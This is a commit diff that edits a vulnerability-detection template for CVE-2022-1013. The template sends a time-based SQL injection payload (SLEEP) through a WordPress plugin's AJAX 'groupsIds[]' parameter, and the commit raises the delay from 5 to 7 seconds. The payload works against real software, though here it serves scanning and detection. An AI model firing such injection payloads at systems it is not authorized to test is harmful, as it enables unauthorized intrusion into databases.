Update CVE-2022-1013.yaml

patch-1
J4vaovo 2024-02-06 23:42:09 +08:00 committed by GitHub
parent 1a04cef30c
commit 6724dfe880
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -37,14 +37,14 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-
action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "\"status\":true,")'
condition: and
# digest: 4b0a00483046022100cc1b536a899d2be73ec9a212babb2305a1da816ad74d39ba63de3232f98f8765022100c614618f9d85011e005dc12bd8761d2ba40d0724a7bea1655048602eb24e661e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cc1b536a899d2be73ec9a212babb2305a1da816ad74d39ba63de3232f98f8765022100c614618f9d85011e005dc12bd8761d2ba40d0724a7bea1655048602eb24e661e:922c64590222798bb761d5b6d8e72950